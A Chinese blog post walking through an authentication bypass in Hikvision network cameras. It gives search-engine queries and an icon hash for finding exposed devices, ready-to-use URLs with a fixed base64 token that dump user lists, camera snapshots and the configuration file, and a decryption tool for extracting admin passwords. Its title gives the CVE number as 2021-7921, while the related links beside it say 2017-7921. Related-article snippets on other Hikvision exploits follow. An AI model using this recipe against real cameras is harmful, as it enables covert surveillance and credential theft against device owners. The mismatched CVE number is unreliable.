海康威视越权访问CVE-2021-7921漏洞复现

最新推荐文章于 2024-10-08 15:43:46 发布
最新推荐文章于 2024-10-08 15:43:46 发布
阅读量1w 收藏 20
点赞数 7
分类专栏: 安全测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47124866/article/details/134150841
版权

0x00 漏洞简介

HikvisionDS-2CD2xx2F-ISeries等是海康威视(Hikvision)公司的网络摄像头产品。多款Hikvision产品中存在身份验证漏洞。攻击者可利用该漏洞提升权限,获取敏感信息的访问权限。
通过构造url进行检索所有用户、屏幕截图、配置文件下载,得到二进制配置文件:configurationFile,并且可以提取登录的账号密码。

0x01 检索漏洞

此处使用hunter进行检索,检索语法

app="Hikvision 海康威视 Firmware 5.0+"&&ip.ports="8000"

为进一步增加检索效率,icon筛选:web.icon=="89b932fcc47cf4ca3faadb0cfdef89cf"

0x02 漏洞复现

该漏洞对auth传参admin:11,并访问特定路径,可以实现截图,配置文件下载,对admin:11进行base64编码,得到auth=YWRtaW46MTEK

此处有三个漏洞,路径分别为:

检索用户与用户列表:http://your-ip/Security/users?auth=YWRtaW46MTEK

获取监控快照:http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK

配置文件:http://your-ip/System/configurationFile?auth=YWRtaW46MTEK

下载配置文件:configurationFile

该文件为加密格式,我们使用工具进行解密hikvision-decrypter.exe

解密后的文件保存,使用十六进制软件WinHex打开,检索admin,可以看到密码

工具下载地址:https://github.com/WormChickenWizard/hikvision-decrypter/releases/tag/v1.0

以上内容仅作验证,禁止非法用途!

海康威视综合安防管理平台 detection 前台RCE漏洞复现
0xSec
07-22 5601
海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 5773
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
海康威视漏洞合集
weixin_46626737的博客
07-03 5647
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。
海康威视CVE-2017-7921漏洞查找与利用
AngrySnack的博客
10-11 3278
海康威视 CVE-2017-7921 漏洞
海康威视__RCE漏洞_CVE-2023-6895 漏洞复现
m0_64366018的博客
01-13 1568
2.复现过程 2.1页面展示 ******************************************************************************************喜欢就点点收藏和关注,如何多人喜欢的话,我尽量日更最新漏洞复现!!******************************************************************************************
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
最新发布
菜鸟学渗透
10-08 2799
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
海康摄像头CVE-2021-36260漏洞复现
热门推荐
剁椒鱼头没剁椒的博客
01-06 3万+
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 8294
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
CVE-2017-7921是一个特定的安全漏洞,它允许攻击者绕过海康威视设备的认证机制,从而获取对设备的未授权访问。这可能导致敏感信息泄露、设备被恶意操控,甚至整个监控网络的瘫痪。 认证绕过漏洞通常是由于软件设计...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
海康威视CVE-2017-7921
qq_46527139的博客
12-22 1万+
海康威视CVE-2017-7921
漏洞复现Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 2519
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 1万+
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
海康威视采集仪ds-k1f600u-d6e驱动
12-13
海康威视采集仪ds-k1f600u-d6e是一款高性能的设备,它可以在监控和安全领域发挥重要作用。要正常使用这款设备,需要安装相应的驱动程序。 您可以通过以下几种方式获取海康威视采集仪ds-k1f600u-d6e的驱动程序。首先,您可以前往海康威视官方网站,在支持和下载页面中找到ds-k1f600u-d6e的驱动程序,并根据操作指南进行安装。其次,您还可以联系当地的海康威视授权经销商,咨询他们是否能够提供安装驱动程序的帮助或支持。 一旦您成功获取了ds-k1f600u-d6e的驱动程序,接下来就是安装的步骤。通常情况下,您只需按照驱动程序安装向导的指示,点击“下一步”、“安装”等按钮,即可完成安装过程。安装完成后,您可能需要重新启动计算机才能使驱动程序生效。 通过上述步骤,您就可以成功获取并安装海康威视采集仪ds-k1f600u-d6e的驱动程序,从而确保设备的正常运行。在安装过程中,如果遇到任何问题或困难,建议及时寻求相关技术支持,以确保一切顺利进行。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

归零者k8

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值